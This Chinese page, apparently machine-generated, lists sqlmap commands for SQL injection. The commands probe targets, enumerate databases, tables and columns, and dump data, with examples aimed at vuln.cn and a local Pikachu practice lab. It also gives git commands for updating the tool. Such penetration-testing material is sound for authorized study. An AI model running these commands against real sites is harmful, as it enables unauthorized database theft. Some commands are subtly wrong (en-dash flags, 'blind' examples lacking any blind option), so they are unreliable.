sqlmap常用命令
时间: 2023-12-08 11:38:41 浏览: 216
以下是sqlmap的几个常用命令:
1. 基本扫描命令:`python sqlmap.py -u <目标URL> --dbs`,用于扫描目标URL的数据库。
2. 指定cookie进行扫描:`python sqlmap.py -u <目标URL> --cookie="<cookie内容>" --dbs`,用于使用指定的cookie进行扫描。
3. 使用配置文件进行扫描:`python sqlmap.py -c sqlmap.conf`,用于使用配置文件进行扫描。
4. 指定注入点进行扫描:`python sqlmap.py -u <目标URL> --data="<POST数据>" --dbs`,用于指定POST数据中的注入点进行扫描。
5. 获取数据库信息:`python sqlmap.py -u <目标URL> -D <数据库名> --tables`,用于获取指定数据库的所有表名。
6. 获取表信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> --columns`,用于获取指定表的所有列名。
7. 获取列信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> -C <列名> --dump`,用于获取指定列的所有数据。
相关问题
sqlmap 更新命令
SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它可以通过发送特定的SQL语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化地获取数据库的信息、提取数据等。
关于SQLMap的更新命令,你可以使用以下命令来更新SQLMap工具:
```
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
```
这个命令会将最新版本的SQLMap工具下载到名为`sqlmap-dev`的文件夹中。如果你已经安装了旧版本的SQLMap,可以使用以下命令进行更新:
```
cd sqlmap-dev
git pull
```
这个命令会将最新的代码从GitHub上拉取到本地,更新你的SQLMap工具。
sqlmap盲注命令
sqlmap盲注是一种通过利用应用程序对数据库的不安全输入处理方式来获取数据库信息的攻击方法。下面是一些常用的sqlmap盲注命令:
1. sqlmap -u "http://www.vuln.cn/post.php?id=1" –dbms mysql –level 3
这个命令是用来检测给定URL是否存在SQL注入漏洞,并指定数据库类型为MySQL,设置检测级别为3。
2. sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=查询" -D pikachu -T users --columns
这个命令用于获取目标网站中数据库pikachu中表users的列名。
3. python sqlmap.py -u url -D DB --tables --batch
这个命令用于在指定的URL中检测数据库漏洞,并获取目标数据库中的表名。
4. sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=查询"
这个命令用于查看目标网站中当前的数据库信息。
以上是一些常用的sqlmap盲注命令,可以帮助你进行数据库的渗透测试和漏洞利用。请注意,使用这些命令需要具备一定的安全技术知识和合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
阅读全文